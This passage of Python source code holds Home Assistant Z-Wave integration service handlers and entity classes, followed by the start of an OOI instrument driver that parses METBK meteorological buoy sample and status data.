"Polling disabled failed (Node %d Value %d)", node_id, value_id
)
else:
if value.enable_poll(intensity):
_LOGGER.info(
"Set polling intensity (Node %d Value %d) to %s",
node_id,
value_id,
intensity,
)
return
_LOGGER.info(
"Set polling intensity failed (Node %d Value %d)", node_id, value_id
)
def remove_failed_node(service):
"""Remove failed node."""
node_id = service.data.get(const.ATTR_NODE_ID)
_LOGGER.info("Trying to remove zwave node %d", node_id)
network.controller.remove_failed_node(node_id)
def replace_failed_node(service):
"""Replace failed node."""
node_id = service.data.get(const.ATTR_NODE_ID)
_LOGGER.info("Trying to replace zwave node %d", node_id)
network.controller.replace_failed_node(node_id)
def set_config_parameter(service):
"""Set a config parameter to a node."""
node_id = service.data.get(const.ATTR_NODE_ID)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
param = service.data.get(const.ATTR_CONFIG_PARAMETER)
selection = service.data.get(const.ATTR_CONFIG_VALUE)
size = service.data.get(const.ATTR_CONFIG_SIZE)
for value in node.get_values(
class_id=const.COMMAND_CLASS_CONFIGURATION
).values():
if value.index != param:
continue
if value.type == const.TYPE_BOOL:
value.data = int(selection == "True")
_LOGGER.info(
"Setting configuration parameter %s on Node %s with bool selection %s",
param,
node_id,
str(selection),
)
return
if value.type == const.TYPE_LIST:
value.data = str(selection)
_LOGGER.info(
"Setting configuration parameter %s on Node %s with list selection %s",
param,
node_id,
str(selection),
)
return
if value.type == const.TYPE_BUTTON:
network.manager.pressButton(value.value_id)
network.manager.releaseButton(value.value_id)
_LOGGER.info(
"Setting configuration parameter %s on Node %s "
"with button selection %s",
param,
node_id,
selection,
)
return
value.data = int(selection)
_LOGGER.info(
"Setting configuration parameter %s on Node %s with selection %s",
param,
node_id,
selection,
)
return
node.set_config_param(param, selection, size)
_LOGGER.info(
"Setting unknown configuration parameter %s on Node %s with selection %s",
param,
node_id,
selection,
)
def refresh_node_value(service):
"""Refresh the specified value from a node."""
node_id = service.data.get(const.ATTR_NODE_ID)
value_id = service.data.get(const.ATTR_VALUE_ID)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
node.values[value_id].refresh()
_LOGGER.info("Node %s value %s refreshed", node_id, value_id)
def set_node_value(service):
"""Set the specified value on a node."""
node_id = service.data.get(const.ATTR_NODE_ID)
value_id = service.data.get(const.ATTR_VALUE_ID)
value = service.data.get(const.ATTR_CONFIG_VALUE)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
node.values[value_id].data = value
_LOGGER.info("Node %s value %s set to %s", node_id, value_id, value)
def print_config_parameter(service):
"""Print a config parameter from a node."""
node_id = service.data.get(const.ATTR_NODE_ID)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
param = service.data.get(const.ATTR_CONFIG_PARAMETER)
_LOGGER.info(
"Config parameter %s on Node %s: %s",
param,
node_id,
get_config_value(node, param),
)
def print_node(service):
"""Print all information about z-wave node."""
node_id = service.data.get(const.ATTR_NODE_ID)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
nice_print_node(node)
def set_wakeup(service):
"""Set wake-up interval of a node."""
node_id = service.data.get(const.ATTR_NODE_ID)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
value = service.data.get(const.ATTR_CONFIG_VALUE)
if node.can_wake_up():
for value_id in node.get_values(class_id=const.COMMAND_CLASS_WAKE_UP):
node.values[value_id].data = value
_LOGGER.info("Node %s wake-up set to %d", node_id, value)
else:
_LOGGER.info("Node %s is not wakeable", node_id)
def change_association(service):
"""Change an association in the zwave network."""
association_type = service.data.get(const.ATTR_ASSOCIATION)
node_id = service.data.get(const.ATTR_NODE_ID)
target_node_id = service.data.get(const.ATTR_TARGET_NODE_ID)
group = service.data.get(const.ATTR_GROUP)
instance = service.data.get(const.ATTR_INSTANCE)
node = ZWaveGroup(group, network, node_id)
if association_type == "add":
node.add_association(target_node_id, instance)
_LOGGER.info(
"Adding association for node:%s in group:%s "
"target node:%s, instance=%s",
node_id,
group,
target_node_id,
instance,
)
if association_type == "remove":
node.remove_association(target_node_id, instance)
_LOGGER.info(
"Removing association for node:%s in group:%s "
"target node:%s, instance=%s",
node_id,
group,
target_node_id,
instance,
)
async def async_refresh_entity(service):
"""Refresh values that specific entity depends on."""
entity_id = service.data.get(ATTR_ENTITY_ID)
async_dispatcher_send(hass, SIGNAL_REFRESH_ENTITY_FORMAT.format(entity_id))
def refresh_node(service):
"""Refresh all node info."""
node_id = service.data.get(const.ATTR_NODE_ID)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
node.refresh_info()
def reset_node_meters(service):
"""Reset meter counters of a node."""
node_id = service.data.get(const.ATTR_NODE_ID)
instance = service.data.get(const.ATTR_INSTANCE)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
for value in node.get_values(class_id=const.COMMAND_CLASS_METER).values():
if value.index != const.INDEX_METER_RESET:
continue
if value.instance != instance:
continue
network.manager.pressButton(value.value_id)
network.manager.releaseButton(value.value_id)
_LOGGER.info(
"Resetting meters on node %s instance %s....", node_id, instance
)
return
_LOGGER.info(
"Node %s on instance %s does not have resettable meters", node_id, instance
)
def heal_node(service):
"""Heal a node on the network."""
node_id = service.data.get(const.ATTR_NODE_ID)
update_return_routes = service.data.get(const.ATTR_RETURN_ROUTES)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
_LOGGER.info("Z-Wave node heal running for node %s", node_id)
node.heal(update_return_routes)
def test_node(service):
"""Send test messages to a node on the network."""
node_id = service.data.get(const.ATTR_NODE_ID)
messages = service.data.get(const.ATTR_MESSAGES)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
_LOGGER.info("Sending %s test-messages to node %s", messages, node_id)
node.test(messages)
def start_zwave(_service_or_event):
"""Startup Z-Wave network."""
_LOGGER.info("Starting Z-Wave network...")
network.start()
hass.bus.fire(const.EVENT_NETWORK_START)
async def _check_awaked():
"""Wait for Z-wave awaked state (or timeout) and finalize start."""
_LOGGER.debug("network state: %d %s", network.state, network.state_str)
start_time = dt_util.utcnow()
while True:
waited = int((dt_util.utcnow() - start_time).total_seconds())
if network.state >= network.STATE_AWAKED:
# Need to be in STATE_AWAKED before talking to nodes.
_LOGGER.info("Z-Wave ready after %d seconds", waited)
break
if waited >= const.NETWORK_READY_WAIT_SECS:
# Wait up to NETWORK_READY_WAIT_SECS seconds for the Z-Wave
# network to be ready.
_LOGGER.warning(
"Z-Wave not ready after %d seconds, continuing anyway", waited
)
_LOGGER.info(
"final network state: %d %s", network.state, network.state_str
)
break
await asyncio.sleep(1)
hass.async_add_job(_finalize_start)
hass.add_job(_check_awaked)
def _finalize_start():
"""Perform final initializations after Z-Wave network is awaked."""
polling_interval = convert(config.get(CONF_POLLING_INTERVAL), int)
if polling_interval is not None:
network.set_poll_interval(polling_interval, False)
poll_interval = network.get_poll_interval()
_LOGGER.info("Z-Wave polling interval set to %d ms", poll_interval)
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, stop_network)
# Register node services for Z-Wave network
hass.services.register(DOMAIN, const.SERVICE_ADD_NODE, add_node)
hass.services.register(DOMAIN, const.SERVICE_ADD_NODE_SECURE, add_node_secure)
hass.services.register(DOMAIN, const.SERVICE_REMOVE_NODE, remove_node)
hass.services.register(DOMAIN, const.SERVICE_CANCEL_COMMAND, cancel_command)
hass.services.register(DOMAIN, const.SERVICE_HEAL_NETWORK, heal_network)
hass.services.register(DOMAIN, const.SERVICE_SOFT_RESET, soft_reset)
hass.services.register(DOMAIN, const.SERVICE_TEST_NETWORK, test_network)
hass.services.register(DOMAIN, const.SERVICE_STOP_NETWORK, stop_network)
hass.services.register(
DOMAIN, const.SERVICE_RENAME_NODE, rename_node, schema=RENAME_NODE_SCHEMA
)
hass.services.register(
DOMAIN, const.SERVICE_RENAME_VALUE, rename_value, schema=RENAME_VALUE_SCHEMA
)
hass.services.register(
DOMAIN,
const.SERVICE_SET_CONFIG_PARAMETER,
set_config_parameter,
schema=SET_CONFIG_PARAMETER_SCHEMA,
)
hass.services.register(
DOMAIN,
const.SERVICE_SET_NODE_VALUE,
set_node_value,
schema=SET_NODE_VALUE_SCHEMA,
)
hass.services.register(
DOMAIN,
const.SERVICE_REFRESH_NODE_VALUE,
refresh_node_value,
schema=REFRESH_NODE_VALUE_SCHEMA,
)
hass.services.register(
DOMAIN,
const.SERVICE_PRINT_CONFIG_PARAMETER,
print_config_parameter,
schema=PRINT_CONFIG_PARAMETER_SCHEMA,
)
hass.services.register(
DOMAIN,
const.SERVICE_REMOVE_FAILED_NODE,
remove_failed_node,
schema=NODE_SERVICE_SCHEMA,
)
hass.services.register(
DOMAIN,
const.SERVICE_REPLACE_FAILED_NODE,
replace_failed_node,
schema=NODE_SERVICE_SCHEMA,
)
hass.services.register(
DOMAIN,
const.SERVICE_CHANGE_ASSOCIATION,
change_association,
schema=CHANGE_ASSOCIATION_SCHEMA,
)
hass.services.register(
DOMAIN, const.SERVICE_SET_WAKEUP, set_wakeup, schema=SET_WAKEUP_SCHEMA
)
hass.services.register(
DOMAIN, const.SERVICE_PRINT_NODE, print_node, schema=NODE_SERVICE_SCHEMA
)
hass.services.register(
DOMAIN,
const.SERVICE_REFRESH_ENTITY,
async_refresh_entity,
schema=REFRESH_ENTITY_SCHEMA,
)
hass.services.register(
DOMAIN, const.SERVICE_REFRESH_NODE, refresh_node, schema=NODE_SERVICE_SCHEMA
)
hass.services.register(
DOMAIN,
const.SERVICE_RESET_NODE_METERS,
reset_node_meters,
schema=RESET_NODE_METERS_SCHEMA,
)
hass.services.register(
DOMAIN,
const.SERVICE_SET_POLL_INTENSITY,
set_poll_intensity,
schema=SET_POLL_INTENSITY_SCHEMA,
)
hass.services.register(
DOMAIN, const.SERVICE_HEAL_NODE, heal_node, schema=HEAL_NODE_SCHEMA
)
hass.services.register(
DOMAIN, const.SERVICE_TEST_NODE, test_node, schema=TEST_NODE_SCHEMA
)
# Setup autoheal
if autoheal:
_LOGGER.info("Z-Wave network autoheal is enabled")
async_track_time_change(hass, heal_network, hour=0, minute=0, second=0)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_START, start_zwave)
hass.services.async_register(DOMAIN, const.SERVICE_START_NETWORK, start_zwave)
for entry_component in PLATFORMS:
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(config_entry, entry_component)
)
return True
class ZWaveDeviceEntityValues:
"""Manages entity access to the underlying zwave value objects."""
def __init__(
self, hass, schema, primary_value, zwave_config, device_config, registry
):
"""Initialize the values object with the passed entity schema."""
self._hass = hass
self._zwave_config = zwave_config
self._device_config = device_config
self._schema = copy.deepcopy(schema)
self._values = {}
self._entity = None
self._workaround_ignore = False
self._registry = registry
for name in self._schema[const.DISC_VALUES].keys():
self._values[name] = None
self._schema[const.DISC_VALUES][name][const.DISC_INSTANCE] = [
primary_value.instance
]
self._values[const.DISC_PRIMARY] = primary_value
self._node = primary_value.node
self._schema[const.DISC_NODE_ID] = [self._node.node_id]
# Check values that have already been discovered for node
for value in self._node.values.values():
self.check_value(value)
self._check_entity_ready()
def __getattr__(self, name):
"""Get the specified value for this entity."""
return self._values[name]
def __iter__(self):
"""Allow iteration over all values."""
return iter(self._values.values())
def check_value(self, value):
"""Check if the new value matches a missing value for this entity.
If a match is found, it is added to the values mapping.
"""
if not check_node_schema(value.node, self._schema):
return
for name in self._values:
if self._values[name] is not None:
continue
if not check_value_schema(value, self._schema[const.DISC_VALUES][name]):
continue
self._values[name] = value
if self._entity:
self._entity.value_added()
self._entity.value_changed()
self._check_entity_ready()
def _check_entity_ready(self):
"""Check if all required values are discovered and create entity."""
if self._workaround_ignore:
return
if self._entity is not None:
return
for name in self._schema[const.DISC_VALUES]:
if self._values[name] is None and not self._schema[const.DISC_VALUES][
name
].get(const.DISC_OPTIONAL):
return
component = self._schema[const.DISC_COMPONENT]
workaround_component = workaround.get_device_component_mapping(self.primary)
if workaround_component and workaround_component != component:
if workaround_component == workaround.WORKAROUND_IGNORE:
_LOGGER.info(
"Ignoring Node %d Value %d due to workaround",
self.primary.node.node_id,
self.primary.value_id,
)
# No entity will be created for this value
self._workaround_ignore = True
return
_LOGGER.debug("Using %s instead of %s", workaround_component, component)
component = workaround_component
entity_id = self._registry.async_get_entity_id(
component, DOMAIN, compute_value_unique_id(self._node, self.primary)
)
if entity_id is None:
value_name = _value_name(self.primary)
entity_id = generate_entity_id(component + ".{}", value_name, [])
node_config = self._device_config.get(entity_id)
# Configure node
_LOGGER.debug(
"Adding Node_id=%s Generic_command_class=%s, "
"Specific_command_class=%s, "
"Command_class=%s, Value type=%s, "
"Genre=%s as %s",
self._node.node_id,
self._node.generic,
self._node.specific,
self.primary.command_class,
self.primary.type,
self.primary.genre,
component,
)
if node_config.get(CONF_IGNORED):
_LOGGER.info("Ignoring entity %s due to device settings", entity_id)
# No entity will be created for this value
self._workaround_ignore = True
return
polling_intensity = convert(node_config.get(CONF_POLLING_INTENSITY), int)
if polling_intensity:
self.primary.enable_poll(polling_intensity)
platform = import_module(f".{component}", __name__)
device = platform.get_device(
node=self._node, values=self, node_config=node_config, hass=self._hass
)
if device is None:
# No entity will be created for this value
self._workaround_ignore = True
return
self._entity = device
@callback
def _on_ready(sec):
_LOGGER.info(
"Z-Wave entity %s (node_id: %d) ready after %d seconds",
device.name,
self._node.node_id,
sec,
)
self._hass.async_add_job(discover_device, component, device)
@callback
def _on_timeout(sec):
_LOGGER.warning(
"Z-Wave entity %s (node_id: %d) not ready after %d seconds, "
"continuing anyway",
device.name,
self._node.node_id,
sec,
)
self._hass.async_add_job(discover_device, component, device)
async def discover_device(component, device):
"""Put device in a dictionary and call discovery on it."""
if self._hass.data[DATA_DEVICES].get(device.unique_id):
return
self._hass.data[DATA_DEVICES][device.unique_id] = device
if component in PLATFORMS:
async_dispatcher_send(self._hass, f"zwave_new_{component}", device)
else:
await discovery.async_load_platform(
self._hass,
component,
DOMAIN,
{const.DISCOVERY_DEVICE: device.unique_id},
self._zwave_config,
)
if device.unique_id:
self._hass.add_job(discover_device, component, device)
else:
self._hass.add_job(check_has_unique_id, device, _on_ready, _on_timeout)
class ZWaveDeviceEntity(ZWaveBaseEntity):
"""Representation of a Z-Wave node entity."""
def __init__(self, values, domain):
"""Initialize the z-Wave device."""
super().__init__()
from openzwave.network import ZWaveNetwork
from pydispatch import dispatcher
self.values = values
self.node = values.primary.node
self.values.primary.set_change_verified(False)
self._name = _value_name(self.values.primary)
self._unique_id = self._compute_unique_id()
self._update_attributes()
dispatcher.connect(
self.network_value_changed, ZWaveNetwork.SIGNAL_VALUE_CHANGED
)
def network_value_changed(self, value):
"""Handle a value change on the network."""
if value.value_id in [v.value_id for v in self.values if v]:
return self.value_changed()
def value_added(self):
"""Handle a new value of this entity."""
def value_changed(self):
"""Handle a changed value for this entity's node."""
self._update_attributes()
self.update_properties()
self.maybe_schedule_update()
async def value_renamed(self, update_ids=False):
"""Rename the node and update any IDs."""
self._name = _value_name(self.values.primary)
if update_ids:
# Update entity ID.
ent_reg = await async_get_entity_registry(self.hass)
new_entity_id = ent_reg.async_generate_entity_id(
self.platform.domain,
self._name,
self.platform.entities.keys() - {self.entity_id},
)
if new_entity_id != self.entity_id:
# Don't change the name attribute, it will be None unless
# customised and if it's been customised, keep the
# customisation.
ent_reg.async_update_entity(self.entity_id, new_entity_id=new_entity_id)
return
        # If we did not rename via the entity registry above, just write the
        # updated state.
self.async_write_ha_state()
async def async_added_to_hass(self):
"""Add device to dict."""
async_dispatcher_connect(
self.hass,
SIGNAL_REFRESH_ENTITY_FORMAT.format(self.entity_id),
self.refresh_from_network,
)
def _update_attributes(self):
"""Update the node attributes. May only be used inside callback."""
self.node_id = self.node.node_id
self._name = _value_name(self.values.primary)
if not self._unique_id:
self._unique_id = self._compute_unique_id()
if self._unique_id:
self.try_remove_and_add()
if self.values.power:
self.power_consumption = round(
self.values.power.data, self.values.power.precision
)
else:
self.power_consumption = None
def update_properties(self):
"""Update on data changes for node values."""
@property
def should_poll(self):
"""No polling needed."""
return False
@property
def unique_id(self):
"""Return a unique ID."""
return self._unique_id
@property
def device_info(self):
"""Return device information."""
identifier, name = node_device_id_and_name(
self.node, self.values.primary.instance
)
info = {
"name": name,
"identifiers": {identifier},
"manufacturer": self.node.manufacturer_name,
"model": self.node.product_name,
}
if self.values.primary.instance > 1:
info["via_device"] = (DOMAIN, self.node_id)
elif self.node_id > 1:
info["via_device"] = (DOMAIN, 1)
return info
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def device_state_attributes(self):
"""Return the device specific state attributes."""
attrs = {
const.ATTR_NODE_ID: self.node_id,
const.ATTR_VALUE_INDEX: self.values.primary.index,
const.ATTR_VALUE_INSTANCE: self.values.primary.instance,
const.ATTR_VALUE_ID: str(self.values.primary.value_id),
}
if self.power_consumption is not None:
attrs[ATTR_POWER] = self.power_consumption
return attrs
def refresh_from_network(self):
"""Refresh all dependent values from zwave network."""
for value in self.values:
if value is not None:
self.node.refresh_value(value.value_id)
def _compute_unique_id(self):
if (
is_node_parsed(self.node) and self.values.primary.label != "Unknown"
) or self.node.is_ready:
return compute_value_unique_id(self.node, self.values.primary)
return None
def compute_value_unique_id(node, value):
"""Compute unique_id a value would get if it were to get one."""
return f"{node.node_id}-{value.object_id}"
|
|
"""
@package mi.instrument.star_asimet.bulkmet.metbk_a.driver
@file marine-integrations/mi/instrument/star_asimet/bulkmet/metbk_a/driver.py
@author Bill Bollenbacher
@brief Driver for the metbk_a
Release notes:
initial version
"""
__author__ = 'Bill Bollenbacher'
__license__ = 'Apache 2.0'
import re
import time
import string
import json
from mi.core.log import get_logger ; log = get_logger()
from mi.core.common import BaseEnum
from mi.core.exceptions import SampleException, \
InstrumentProtocolException
from mi.core.time_tools import get_timestamp_delayed
from mi.core.instrument.instrument_protocol import CommandResponseInstrumentProtocol
from mi.core.instrument.instrument_fsm import ThreadSafeFSM
from mi.core.instrument.chunker import StringChunker
from mi.core.instrument.instrument_driver import DriverConnectionState
from mi.core.driver_scheduler import DriverSchedulerConfigKey
from mi.core.driver_scheduler import TriggerType
from mi.core.instrument.instrument_driver import SingleConnectionInstrumentDriver
from mi.core.instrument.instrument_driver import DriverEvent
from mi.core.instrument.instrument_driver import DriverAsyncEvent
from mi.core.instrument.instrument_driver import DriverProtocolState
from mi.core.instrument.instrument_driver import DriverParameter
from mi.core.instrument.instrument_driver import ResourceAgentState
from mi.core.instrument.instrument_driver import DriverConfigKey
from mi.core.instrument.data_particle import DataParticle
from mi.core.instrument.data_particle import DataParticleKey
from mi.core.instrument.data_particle import CommonDataParticleType
from mi.core.instrument.driver_dict import DriverDictKey
from mi.core.instrument.protocol_param_dict import ProtocolParameterDict, \
ParameterDictType, \
ParameterDictVisibility
# newline.
NEWLINE = '\r\n'
# default timeout.
TIMEOUT = 10
SYNC_TIMEOUT = 30
AUTO_SAMPLE_SCHEDULED_JOB = 'auto_sample'
LOGGING_STATUS_REGEX = r'.*Sampling (GO|STOPPED)'
LOGGING_STATUS_COMPILED = re.compile(LOGGING_STATUS_REGEX, re.DOTALL)
LOGGING_SYNC_REGEX = r'.*Sampling GO - synchronizing...'
LOGGING_SYNC_COMPILED = re.compile(LOGGING_SYNC_REGEX, re.DOTALL)
####
# Driver Constant Definitions
####
class ScheduledJob(BaseEnum):
ACQUIRE_STATUS = 'acquire_status'
CLOCK_SYNC = 'clock_sync'
class ProtocolState(BaseEnum):
"""
Instrument protocol states
"""
UNKNOWN = DriverProtocolState.UNKNOWN
COMMAND = DriverProtocolState.COMMAND
AUTOSAMPLE = DriverProtocolState.AUTOSAMPLE
DIRECT_ACCESS = DriverProtocolState.DIRECT_ACCESS
SYNC_CLOCK = 'PROTOCOL_STATE_SYNC_CLOCK'
class ProtocolEvent(BaseEnum):
"""
Protocol events
"""
ENTER = DriverEvent.ENTER
EXIT = DriverEvent.EXIT
DISCOVER = DriverEvent.DISCOVER
EXECUTE_DIRECT = DriverEvent.EXECUTE_DIRECT
START_DIRECT = DriverEvent.START_DIRECT
STOP_DIRECT = DriverEvent.STOP_DIRECT
GET = DriverEvent.GET
SET = DriverEvent.SET
ACQUIRE_SAMPLE = DriverEvent.ACQUIRE_SAMPLE
ACQUIRE_STATUS = DriverEvent.ACQUIRE_STATUS
CLOCK_SYNC = DriverEvent.CLOCK_SYNC
START_AUTOSAMPLE = DriverEvent.START_AUTOSAMPLE
STOP_AUTOSAMPLE = DriverEvent.STOP_AUTOSAMPLE
FLASH_STATUS = 'DRIVER_EVENT_FLASH_STATUS'
class Capability(BaseEnum):
"""
Protocol events that should be exposed to users (subset of above).
"""
GET = ProtocolEvent.GET
SET = ProtocolEvent.SET
ACQUIRE_STATUS = ProtocolEvent.ACQUIRE_STATUS
ACQUIRE_SAMPLE = ProtocolEvent.ACQUIRE_SAMPLE
CLOCK_SYNC = ProtocolEvent.CLOCK_SYNC
START_AUTOSAMPLE = ProtocolEvent.START_AUTOSAMPLE
STOP_AUTOSAMPLE = ProtocolEvent.STOP_AUTOSAMPLE
FLASH_STATUS = ProtocolEvent.FLASH_STATUS
START_DIRECT = ProtocolEvent.START_DIRECT
STOP_DIRECT = ProtocolEvent.STOP_DIRECT
class Parameter(DriverParameter):
"""
Device specific parameters.
"""
CLOCK = 'clock'
SAMPLE_INTERVAL = 'sample_interval'
class Prompt(BaseEnum):
"""
Device i/o prompts.
"""
CR_NL = NEWLINE
STOPPED = "Sampling STOPPED"
SYNC = "Sampling GO - synchronizing..."
GO = "Sampling GO"
FS = "bytes free\r" + NEWLINE
class Command(BaseEnum):
"""
Instrument command strings
"""
GET_CLOCK = "#CLOCK"
SET_CLOCK = "#CLOCK="
D = "#D"
FS = "#FS"
STAT = "#STAT"
GO = "#GO"
STOP = "#STOP"
class DataParticleType(BaseEnum):
"""
Data particle types produced by this driver
"""
RAW = CommonDataParticleType.RAW
METBK_PARSED = 'metbk_parsed'
METBK_STATUS = 'metbk_status'
###############################################################################
# Data Particles
###############################################################################
class METBK_SampleDataParticleKey(BaseEnum):
BAROMETRIC_PRESSURE = 'barometric_pressure'
RELATIVE_HUMIDITY = 'relative_humidity'
AIR_TEMPERATURE = 'air_temperature'
LONGWAVE_IRRADIANCE = 'longwave_irradiance'
PRECIPITATION = 'precipitation'
SEA_SURFACE_TEMPERATURE = 'sea_surface_temperature'
SEA_SURFACE_CONDUCTIVITY = 'sea_surface_conductivity'
SHORTWAVE_IRRADIANCE = 'shortwave_irradiance'
EASTWARD_WIND_VELOCITY = 'eastward_wind_velocity'
NORTHWARD_WIND_VELOCITY = 'northward_wind_velocity'
class METBK_SampleDataParticle(DataParticle):
_data_particle_type = DataParticleType.METBK_PARSED
@staticmethod
def regex_compiled():
"""
get the compiled regex pattern
@return: compiled re
"""
        SAMPLE_DATA_PATTERN = (r'(-*\d+\.\d+)' +    # BPR
                               r'\s*(-*\d+\.\d+)' + # RH %
                               r'\s*(-*\d+\.\d+)' + # RH temp
                               r'\s*(-*\d+\.\d+)' + # LWR
                               r'\s*(-*\d+\.\d+)' + # PRC
                               r'\s*(-*\d+\.\d+)' + # ST
                               r'\s*(-*\d+\.\d+)' + # SC
                               r'\s*(-*\d+\.\d+)' + # SWR
                               r'\s*(-*\d+\.\d+)' + # We
                               r'\s*(-*\d+\.\d+)' + # Wn
                               '.*?' + NEWLINE)     # throw away batteries
return re.compile(SAMPLE_DATA_PATTERN, re.DOTALL)
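    # Illustrative (made-up) sample line the pattern above would match: ten
    # floats followed by a battery voltage that is thrown away, e.g.
    #   '1013.2  75.3  22.1  350.0  0.00  18.5  4.20  801.0  1.2  -0.5  12.1\r\n'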
def _build_parsed_values(self):
match = METBK_SampleDataParticle.regex_compiled().match(self.raw_data)
if not match:
raise SampleException("METBK_SampleDataParticle: No regex match of parsed sample data: [%s]", self.raw_data)
result = [{DataParticleKey.VALUE_ID: METBK_SampleDataParticleKey.BAROMETRIC_PRESSURE,
DataParticleKey.VALUE: float(match.group(1))},
{DataParticleKey.VALUE_ID: METBK_SampleDataParticleKey.RELATIVE_HUMIDITY,
DataParticleKey.VALUE: float(match.group(2))},
{DataParticleKey.VALUE_ID: METBK_SampleDataParticleKey.AIR_TEMPERATURE,
DataParticleKey.VALUE: float(match.group(3))},
{DataParticleKey.VALUE_ID: METBK_SampleDataParticleKey.LONGWAVE_IRRADIANCE,
DataParticleKey.VALUE: float(match.group(4))},
{DataParticleKey.VALUE_ID: METBK_SampleDataParticleKey.PRECIPITATION,
DataParticleKey.VALUE: float(match.group(5))},
{DataParticleKey.VALUE_ID: METBK_SampleDataParticleKey.SEA_SURFACE_TEMPERATURE,
DataParticleKey.VALUE: float(match.group(6))},
{DataParticleKey.VALUE_ID: METBK_SampleDataParticleKey.SEA_SURFACE_CONDUCTIVITY,
DataParticleKey.VALUE: float(match.group(7))},
{DataParticleKey.VALUE_ID: METBK_SampleDataParticleKey.SHORTWAVE_IRRADIANCE,
DataParticleKey.VALUE: float(match.group(8))},
{DataParticleKey.VALUE_ID: METBK_SampleDataParticleKey.EASTWARD_WIND_VELOCITY,
DataParticleKey.VALUE: float(match.group(9))},
{DataParticleKey.VALUE_ID: METBK_SampleDataParticleKey.NORTHWARD_WIND_VELOCITY,
DataParticleKey.VALUE: float(match.group(10))}]
log.debug("METBK_SampleDataParticle._build_parsed_values: result=%s" %result)
return result
class METBK_StatusDataParticleKey(BaseEnum):
INSTRUMENT_MODEL = 'instrument_model'
SERIAL_NUMBER = 'serial_number'
CALIBRATION_DATE = 'calibration_date'
FIRMWARE_VERSION = 'firmware_version'
DATE_TIME_STRING = 'date_time_string'
LOGGING_INTERVAL = 'logging_interval'
CURRENT_TICK = 'current_tick'
RECENT_RECORD_INTERVAL = 'recent_record_interval'
FLASH_CARD_PRESENCE = 'flash_card_presence'
BATTERY_VOLTAGE_MAIN = 'battery_voltage_main'
FAILURE_MESSAGES = 'failure_messages'
PTT_ID1 = 'ptt_id1'
PTT_ID2 = 'ptt_id2'
PTT_ID3 = 'ptt_id3'
SAMPLING_STATE = 'sampling_state'
class METBK_StatusDataParticle(DataParticle):
_data_particle_type = DataParticleType.METBK_STATUS
@staticmethod
def regex_compiled():
"""
get the compiled regex pattern
@return: compiled re
"""
        STATUS_DATA_PATTERN = (r'Model:\s+(.+?)\r\n' +
                               r'SerNum:\s+(.+?)\r\n' +
                               r'CfgDat:\s+(.+?)\r\n' +
                               r'Firmware:\s+(.+?)\r\n' +
                               r'RTClock:\s+(.+?)\r\n' +
                               r'Logging Interval:\s+(\d+);\s+' +
                               r'Current Tick:\s+(\d+)\r\n' +
                               r'R-interval:\s+(.+?)\r\n' +
                               r'(.+?)\r\n' + # compact flash info
                               r'Main Battery Voltage:\s+(.+?)\r\n' +
                               r'(.+?)' + # module failures & PTT messages
                               r'\r\nSampling\s+(\w+)\r\n')
return re.compile(STATUS_DATA_PATTERN, re.DOTALL)
def _build_parsed_values(self):
log.debug("METBK_StatusDataParticle: input = %s" %self.raw_data)
match = METBK_StatusDataParticle.regex_compiled().match(self.raw_data)
if not match:
raise SampleException("METBK_StatusDataParticle: No regex match of parsed status data: [%s]", self.raw_data)
result = [{DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.INSTRUMENT_MODEL,
DataParticleKey.VALUE: match.group(1)},
{DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.SERIAL_NUMBER,
DataParticleKey.VALUE: match.group(2)},
{DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.CALIBRATION_DATE,
DataParticleKey.VALUE: match.group(3)},
{DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.FIRMWARE_VERSION,
DataParticleKey.VALUE: match.group(4)},
{DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.DATE_TIME_STRING,
DataParticleKey.VALUE: match.group(5)},
{DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.LOGGING_INTERVAL,
DataParticleKey.VALUE: int(match.group(6))},
{DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.CURRENT_TICK,
DataParticleKey.VALUE: int(match.group(7))},
{DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.RECENT_RECORD_INTERVAL,
DataParticleKey.VALUE: int(match.group(8))},
{DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.FLASH_CARD_PRESENCE,
DataParticleKey.VALUE: match.group(9)},
{DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.BATTERY_VOLTAGE_MAIN,
DataParticleKey.VALUE: float(match.group(10))},
{DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.SAMPLING_STATE,
DataParticleKey.VALUE: match.group(12)}]
lines = match.group(11).split(NEWLINE)
length = len(lines)
print ("length=%d; lines=%s" %(length, lines))
if length < 3:
raise SampleException("METBK_StatusDataParticle: Not enough PTT lines in status data: [%s]", self.raw_data)
# grab PTT lines
result.append({DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.PTT_ID1,
DataParticleKey.VALUE: lines[length-3]})
result.append({DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.PTT_ID2,
DataParticleKey.VALUE: lines[length-2]})
result.append({DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.PTT_ID3,
DataParticleKey.VALUE: lines[length-1]})
# grab any module failure lines
if length > 3:
length -= 3
failures = []
for index in range(0, length):
failures.append(lines[index])
result.append({DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.FAILURE_MESSAGES,
DataParticleKey.VALUE: failures})
log.debug("METBK_StatusDataParticle: result = %s" %result)
return result
###############################################################################
# Driver
###############################################################################
class InstrumentDriver(SingleConnectionInstrumentDriver):
"""
InstrumentDriver subclass
Subclasses SingleConnectionInstrumentDriver with connection state
machine.
"""
def __init__(self, evt_callback):
"""
Driver constructor.
@param evt_callback Driver process event callback.
"""
